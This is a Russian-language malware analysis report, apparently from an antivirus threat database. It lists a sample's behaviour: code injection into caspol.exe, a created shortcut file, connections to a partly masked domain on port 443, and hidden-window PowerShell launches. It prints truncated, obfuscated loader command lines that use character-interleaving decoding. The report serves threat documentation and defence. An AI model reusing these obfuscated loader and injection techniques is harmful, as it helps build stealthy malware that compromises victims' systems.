Техническая информация
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\documents\forlovelsesgaver1662.lnk
Сетевая активность
Подключается к
- 'su#####echcenter.com':443
TCP
Другие
- 'su#####echcenter.com':443
UDP
- DNS ASK su#####echcenter.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Taffelbjerg = """TFPuRnWcMtFiOoSnA SCAoCnRvCeOrFsTaBbAlAeK0P0S f{SpSaSrSaMmG(U[FSltArTiFnHgC]M`$LMSoGdUiMfPiUkHaPtDiVoAnUeJrE)i;FFsoHrs(P`$DHPaWaSnGdCsTkPyOdBeKvBaMaSbEernGeZtB=O1h;C B`$UHRaS...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe' ' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c echo REG_SZ
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$Taffelbjerg = """TFPuRnWcMtFiOoSnA SCAoCnRvCeOrFsTaBbAlAeK0P0S f{SpSaSrSaMmG(U[FSltArTiFnHgC]M`$LMSoGdUiMfPiUkHaPtDiVoAnUeJrE)i;FFsoHrs(P`$DHPaWaSnGdCsTkPyOdBeKvBaMaSbEernGeZtB=O1h;C B`$UHRaS...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Conversable00 {param([String]$Modifikationer);For($Haandskydevaabenet=1; $Haandskydevaabenet -lt $Modifikationer.Length-1; $Haandskydevaabenet+=(1+1)){$katarer = $katarer + $Modifikat...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe'
